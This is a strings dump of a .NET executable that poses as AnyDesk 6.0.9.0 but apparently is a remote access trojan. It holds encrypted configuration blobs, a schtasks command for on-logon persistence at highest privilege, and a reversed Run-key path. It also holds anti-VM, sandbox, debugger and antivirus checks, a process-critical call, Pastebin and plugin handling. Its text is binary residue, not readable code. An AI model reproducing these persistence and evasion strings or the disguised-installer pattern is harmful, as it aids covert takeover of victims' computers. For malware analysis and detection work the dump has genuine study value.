!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
Action`10
IEnumerable`1
CallSite`1
List`1
Microsoft.Win32
ToUInt32
ToInt32
X509Certificate2
ToUInt64
ToInt64
ToUInt16
ToInt16
HMACSHA256
get_UTF8
<Module>
nvbuLykGQNuCA
VEpccsDxgEYA
leAKQFRkULqrKfA
NejywXvZkUmhLfA
nWqPHbPCHUfhsA
gkpTHYbXzvvyA
YfevNvfvCzjqKB
JjfmANWJOqExkB
QYyBFAksMDC
GPlksonpZMC
CZZOfcJzSGbC
PnGFhPZiHQXpcC
YEsTrpnHrscC
FyMGjwVEqDkC
bpYOMUSrfYqC
MapNameToOID
get_FormatID
INDsxTcoUBrTD
rbvoZUWWuFxeD
VSxFMQUPvnYnD
FEsaltTLuOoD
QfSlzZRGVQyAFTpD
ZQHmbviLgARqsD
yFccRqwwTjjtzD
sjwWRqeJqIhIDE
XAbOXQCffmznEGE
ksGfQPbdGEIE
erqkaCKRxKxME
qWkjFavNzenXE
WPbhvrNOePaE
IWpaJVGsQFUSqE
MCEkdILiXyPtE
hNPfYxMWfCJNLF
utRnBjiAPZF
MfffaiankJobF
uwoTzzQyopcF
MEZMvUUqqtxeDG
CKkmEUYRriAPG
DnXAUlWYgRoAlkTG
rVvvdOvKEUG
bgQSwxIjLVG
uFrPFfGntBgfhG
jHvKtWgaWkjG
GFpHcPxTtiQvTvPH
PekfabNNEYcH
DndrBYaGsH
YZEhKNmCPmduH
aTiGkHoENPzrCI
VSGxxVfouEI
DsEeuveXFI
get_ASCII
GyzxFzdlKI
znqCjqSLrsKI
FMJxUZsumLI
emwNAkBZUQeMI
ieHPifhjldekPVI
jfqfAgLtpVI
YthSxUwgEYI
RrOSpnCPZvIeI
NLnJnnWGccjI
mhddaMGEFfbBkI
tRrPKwrOIjRnI
YieBGVHSbNnqI
zBrdpoGzHfszI
dLshZxJgwCJ
fYLBBfdUYJ
WVYJbTITwVYJ
CyEMEGylSdvGzaUbZJ
AygmJDOTKdNdhJ
rCkcqxYwRhSYdAK
TgXvCBphzAK
oAIHEaOTcZRBK
rpDIgoUkMJEK
KCucwQVjJNUK
gTrYHtYGCHjfpVWmK
VeITawUgwJPuSYFL
HZEVJObEOkbL
bBfxqMQjfeEfL
PzvyRipFKqhL
LGKnpRiwzFlL
CAwyoqJYBetXQzL
RxrpEkzpdM
vBnyrBEWUnrM
xpJKnujZWAAN
gBOBIhLgwDN
uUWxNNkqHN
frAvkasGImMKdaN
zbfQoJExthN
wRwPMnEvWKmUIBO
iGqyKqelXgFO
System.IO
TGBBotPFjMO
DPpOEgrJfsGiRO
dAvqCrJyjFGCaRxnO
HpzCHIYIoqO
YfZMKpzwGsO
zUwsctnTrMedwO
kxWtQkBprBgwO
pxWnQPURkNkBP
QjqYgzlsYTDP
cjIhypXvfPUyshP
zcbSrGCMLtP
rHThsNKJlfWLwP
qCMaMpBhAmPxP
OIhWhbzbdntyBQ
mdXdllnMXQoHQ
RfQTzOLbyAjLOUQ
dLrZxDXerVQ
ONeWPLxLqCqQdQ
gcWVujTrprcoIajeQ
NfqytMrWPvkoQ
kGqwVZNnYtyQ
THRJYQUVjPmIVABR
wrwqnRKpbKGR
pnuATeRLEQNOR
EYRHbkKUVdOMPR
aZBzttTaoLcjmR
xChsAXFuRMnR
pVpXKtCqUvyyR
ixHrcBkLoPxAGS
zsvgEOyrkGS
xXOGkTntTIS
ZqEJiwTqwQeXXS
KuFFYOaSAkQmjqTibS
SPDQWZimFyXwCcS
HYmrMFiWsJdJRnS
atadglhvkzS
nqZUZemLiDIxCT
SYmyAXDSXOUEEznT
unTDgRCZdZAuT
MmeDzLCYriJrxxT
hzyqvYyEILFU
ALtFzpPPLU
UiviFFNyWKVLQU
MiKVOIlLCbwUU
IOKbjmlnGpVSXU
pZZBdsdVXU
sIAYZIHcqaU
oOrwLzrtHjfFnU
KPCWMSvXqQZYrU
QjVkPZIOECFUWzU
NnglTFOCIDV
aRaYbbURpcGHGV
HpMwCTNiGV
FlhpJMwpvdHV
get_IV
set_IV
GenerateIV
UAUgwUPcLoiCyukKV
vAiENOqZEHEyJVGTV
TDIZlUOmuSUV
OLotnlWRfV
TIBFrftsqNePmV
HfHMazweooqrV
VyLYyncSqW
EKzOCvHefaryW
YNHldHHRSGX
HHmBMgHANX
MWPGbkKGNX
SzqrWZXqNfUMIOX
rgYSXKKUtTX
pDZCvpTCILGY
QhntdwRFpDFIY
tersaoAQsMY
iplBXQpqFRiTY
JAXBvJMJriY
nrWVggurJJHcQkY
HZqeGpOqNxQkY
smPPYTyBUDBoNtY
nLRsbzUkbvY
qKfOGBQNPrwY
ImSQvEcbVYEthzXAFZ
qrbICUiLUOHZ
tuzEwfXhoItLlOIZ
vvZNnFzJXMNZ
iFtcMEehhcZ
BFssjtQpznZ
zmMSIZizMDtZ
value__
zumBCUFzsWnEa
mbWHmcpPXiPKFa
zIHWrktnAWKhFa
RoFMNsHcIQntHa
WsxFijjLbteCFJa
mYWlcoRHapwgSaa
qyDtHkBtDda
YvmNSthwLdea
kduKxZxGpa
IJHiWvNLfVBxa
ZUHdZXpEcGCya
xyEdQJeqvCb
MMLPqIdfGMb
JSDGuFcRGOb
ZwVSldMWLuTzOPb
lrtRECtDUuTb
gjOctwRNLXUb
yYlyNXAgYdb
mscorlib
aqWrTsuiZMTCc
TVtCSaUgNXrCc
nQZPMMmjTyUc
kbFzfPLPXc
System.Collections.Generic
Microsoft.VisualBasic
get_SendSync
ihkzOcOfSILahvc
kMKmkAkEVLfOqAd
HMBNJAVxdlaFd
BlHIINGyJd
FpvfBSZVBQUyNd
EndRead
BeginRead
Thread
jOtYzdZhIHpmad
VBiwfRrMqqEed
SHA256Managed
get_Connected
get_IsConnected
set_IsConnected
get_Guid
<SendSync>k__BackingField
<IsConnected>k__BackingField
<KeepAlive>k__BackingField
<HeaderSize>k__BackingField
<Ping>k__BackingField
<ActivatePong>k__BackingField
<Interval>k__BackingField
<Buffer>k__BackingField
<Offset>k__BackingField
<SslClient>k__BackingField
<TcpClient>k__BackingField
Append
RegistryValueKind
YubZtHhKRnxTud
aVahgKRjzd
XzUxLXqsKdAe
qYxItKsFPFe
kAOYcuSHCMOe
iDWdjEDrxRWe
Replace
CreateInstance
VUnxLOXDBZde
set_Mode
FileMode
PaddingMode
EnterDebugMode
CryptoStreamMode
CompressionMode
CipherMode
SelectMode
DeleteSubKeyTree
get_Message
JowAjnkBCxWmmie
Invoke
IEnumerable
IDisposable
ToDouble
get_Handle
RuntimeFieldHandle
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
WaitHandle
ToSingle
IsInRole
WindowsBuiltInRole
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_Name
get_FileName
set_FileName
GetTempFileName
GetFileName
get_MachineName
get_OSFullName
get_FullName
get_UserName
CheckHostName
DateTime
get_LastWriteTime
ToUniversalTime
WriteLine
Combine
UriHostNameType
get_ValueType
ProtocolType
GetType
SocketType
FileShare
System.Core
Dispose
StrReverse
X509Certificate
Create
SetThreadExecutionState
Delete
CallSite
CompilerGeneratedAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ReadByte
WriteByte
DeleteValue
GetValue
SetValue
get_KeepAlive
set_KeepAlive
Remove
set_BlockSize
get_TotalSize
get_HeaderSize
set_HeaderSize
set_SendBufferSize
set_ReceiveBufferSize
set_KeySize
UDbwEWPvdphHSf
YwhyXFLCibMkBnqf
wMFJfEljxxf
ummSPkMXrDg
gxRbyzzkzGFg
inSTkgFviAKg
ySsyhCzngupIISg
dCROPssBccfg
CryptoConfig
jONLXWYalYkg
liVvBstWfRRlg
kzfxCiJXLytuavnlg
get_Ping
set_Ping
System.Threading
set_Padding
add_SessionEnding
UTF8Encoding
System.Drawing.Imaging
System.Runtime.Versioning
FromBase64String
ToBase64String
DownloadString
ToString
get_AsString
set_AsString
GetString
Substring
System.Drawing
get_ActivatePong
set_ActivatePong
set_ErrorDialog
KiOuJgGkSGvg
jkSjrHWMFCCNFh
NTODIYrzzXBghGh
UTxOXPvakmqOh
KaHLkQFXmxxSh
ComputeHash
VerifyHash
get_ExecutablePath
GetTempPath
get_Length
hLEWtwoaCuwsLHwh
HuqDzCpwJrDi
DJAgOeqrAtDi
FLprrOFaCVRFi
ZfMJrIhEhouLi
hiazYVEDgcRi
icdiFAxErSi
hbTiBTPpnWi
sNRRNfObji
jEjfRJlZyIli
uBPKHlKecmni
hkaXMNjYkwyqi
BGbWHmVAlxHj
rbARuaqaAHiOj
plXRtKpeottDPj
qbsaTdwZVvj
wmrPnCjIqMack
AsyncCallback
RemoteCertificateValidationCallback
TimerCallback
RegistryKeyPermissionCheck
FlushFinalBlock
vZMstaxQovtEYxcdk
sCmTJgSEPek
uOpeCZINYPdKYek
OJbhbadvBfk
xIkDkjDmjqhk
WiSYlmYQlk
bfhTqybkYOl
fauCQexjKllzzlRl
WknDQubPSl
jnBxIldrbyTl
gVawiTxubxHhUl
RtlSetProcessIsCritical
NetworkCredential
System.Security.Principal
WindowsPrincipal
get_Interval
set_Interval
kernel32.dll
user32.dll
ntdll.dll
dmywQQYdQOm
YbjEHczUhRzPm
FileStream
NetworkStream
SslStream
CryptoStream
GZipStream
MemoryStream
get_Item
get_Is64BitOperatingSystem
dyyajlwCgm
SymmetricAlgorithm
AsymmetricAlgorithm
HashAlgorithm
Random
NsxOluaklFxom
ICryptoTransform
UITPaiBopsm
rvnWBUJgdUBtm
meajojISMCym
uAzXPZFfQvRn
ToBoolean
PRWLebVqMMFcn
X509Chain
AppDomain
get_CurrentDomain
GetFileNameWithoutExtension
get_OSVersion
System.IO.Compression
Application
System.Security.Authentication
System.Reflection
X509CertificateCollection
ManagementObjectCollection
set_Position
CryptographicException
ArgumentNullException
ArgumentException
ZLGgrdSBOlQsn
kjnuraKjsHo
TPCfOXqONo
ImageCodecInfo
FileInfo
DriveInfo
FileSystemInfo
ComputerInfo
CSharpArgumentInfo
ProcessStartInfo
pzDZdEmeonDho
WlTVsHANfrEMuo
TBzCVKUjaqOyo
EwqlaetmDJLReyo
mEECQXOXpAp
FvSDHfHWbKZsgp
JCsgIVtcnmp
Microsoft.CSharp
cTSKSKtpfsLyPxup
AtgwKhwZZcdRNbq
NhHYxFnWjIYEWeq
IMRnYhuJkq
LNGLBwINFIqKlq
System.Linq
xuNFrPfUoq
KtohQDesFPuq
iQoANlYzqEwq
ClvWtJGSeOxq
JIrbkMjbboKVlFr
LRQqeqGbQSYGr
NqYlbMvlzdHr
NrUiyCqxVfKr
jirctvoaiuQr
rgYJQkRwbLFTr
edtdwhJoTmXNHUr
TeBzxTBFLRHar
InvokeMember
MD5CryptoServiceProvider
RSACryptoServiceProvider
AesCryptoServiceProvider
StringBuilder
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
get_Buffer
set_Buffer
get_AsInteger
set_AsInteger
ManagementObjectSearcher
SessionEndingEventHandler
ToUpper
CurrentUser
StreamWriter
TextWriter
BitConverter
ToLower
TVZlnSxjJjr
YhRskSHJCPLNor
IEnumerator
ManagementObjectEnumerator
System.Collections.IEnumerable.GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
qURVDzRxFHMqr
PNmSKTswlqr
IntPtr
KZuqqmBMinRAs
OyZuzACHfEHs
XpwrgIIwMMHs
System.Diagnostics
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
ExpandEnvironmentVariables
GetProcesses
GetHostAddresses
System.Security.Cryptography.X509Certificates
Rfc2898DeriveBytes
ReadAllBytes
GetBytes
CSharpArgumentInfoFlags
CSharpBinderFlags
Strings
SessionEndingEventArgs
vBpdBURRwnCPis
ICredentials
set_Credentials
Equals
yKvhQBCdls
SslProtocols
System.Windows.Forms
Contains
System.Collections
StringSplitOptions
GetImageDecoders
RuntimeHelpers
SslPolicyErrors
FileAccess
GetCurrentProcess
IPAddress
System.Net.Sockets
set_Arguments
SystemEvents
Exists
bfaxqXqcPBws
PbAqCvMUMhdjLt
iFXrCMssPJPNt
IEAJDrJDHXt
Concat
ImageFormat
get_AsFloat
set_AsFloat
foUZIDQljcbt
THGWPnjOFmCct
ManagementBaseObject
Collect
Connect
System.Net
Target
Socket
System.Collections.IEnumerator.Reset
get_Offset
set_Offset
IAsyncResult
ToUpperInvariant
WebClient
AsyncClient
get_SslClient
set_SslClient
get_TcpClient
set_TcpClient
AuthenticateAsClient
System.Management
Environment
System.Collections.IEnumerator.get_Current
GetCurrent
CheckRemoteDebuggerPresent
get_RemoteEndPoint
get_Count
get_ProcessorCount
LWLfNNLTSot
GetPathRoot
ParameterizedThreadStart
Convert
FailFast
ToList
System.Collections.IEnumerator.MoveNext
System.Text
GetWindowText
crtUhdNcQWJyt
HBshymPxmfVqOu
gUvAIowlQxPu
LOKkUmvzxZGZu
bEqqiUosVdviju
KZgyMttJlu
NikpRbBSru
SUdjNidSdVVhBv
oYYmgYqFWvBv
oHcdzYgHQfxNv
DHmohYnONMJIibv
tnGpEtTwRLgmvgjv
nMeLfTWkcwsv
PebjXFVwyLw
sheQASCdFdOw
GetForegroundWindow
set_CreateNoWindow
zPAAUxpJbCxjzBx
OQnibWPPnpgLx
lNFiyJlJAGOx
RHsuMEGNpKax
mfUQlXaCBcXMy
InitializeArray
ToArray
get_AsArray
MKFKuOWwgLHydy
get_Key
set_Key
CreateSubKey
OpenSubKey
get_PublicKey
RegistryKey
System.Security.Cryptography
Assembly
AddressFamily
BlockCopy
ToBinary
get_SystemDirectory
Registry
rlPdwRdJusy
op_Equality
op_Inequality
System.Net.Security
WindowsIdentity
IsNullOrEmpty
gsCeGyioxKPBz
flcnIATzvOmDz
CZcmEmGvSdpFFz
WPYRqezOVNLz
yDnnjQzDMubz
ewgROALvybz
wIAngJNvRymz
gezsLfdpClsCvz
CSvtCaQeswz
fSnPniffWzz
WrapNonExceptionThrows
1.0.0.0
).NETFramework,Version=v4.0,Profile=Client
FrameworkDisplayName .NET Framework 4 Client Profile
_CorExeMain
mscoree.dll
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application>
</compatibility>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>PPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
SHA256
zGA2MUnyg3F7+eGuTEx37/5M0mjMw0iQyUpz2B7HfZJ9Lj3egZdLZ1BnWxzSGN0Ymc7gaUPCJlEdYPls8eLBpQ==
xZ1CHe6KFVY8Ik46xivmxQnhgXjFx0eU3X4q6rebI4DcOwG6G8Me8tKQLGG8fOroVGe8CZj0R6KAFVUlT/WJCQ==
vgOMbnPBQXA2pONUAcdwqFKlO578AMY5rqcoJbqDK9gQUDkU9XThiNTrwwasVGm01OaYV61ZYGsHTHH5CN8FyQ==
8Uiq9JkvUoDOlJhzlAw1qJap5plw2fJSaPjcwxsjBVH6KaetZ/Lf+/KZKegzXLf9bb96XjopsMgzjoK2o46ddw==
%AppData%
Regedit.exe
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
Packet
Message
/c schtasks /create /f /sc onlogon /rl highest /tn "
" /tr '"
"' & exit
\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
@echo off
timeout 3 > NUL
START "" "
" /f /q
Select * from Win32_ComputerSystem
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
SbieDll.dll
Err HWID
ClientInfo
Microsoft
Version
Performance
Pastebin
Antivirus
Installed
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
Software\
plugin
savePlugin
sendPlugin
Hashes
Plugin.Plugin
Msgpack
Received
masterKey can not be null or empty.
input can not be null.
Invalid message authentication code (MAC).
{0:D3}
{0:X2}
(never used) type $c1
(ext8,ext16,ex32) type $c7,$c8,$c9
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
philandro Software GmbH
FileDescription
AnyDesk
FileVersion
6.0.9.0
InternalName
LegalCopyright
(C) 2020 philandro Software GmbH
LegalTrademarks
OriginalFilename
ProductName
AnyDesk
ProductVersion
6.0.9.0
Assembly Version
6.0.9.0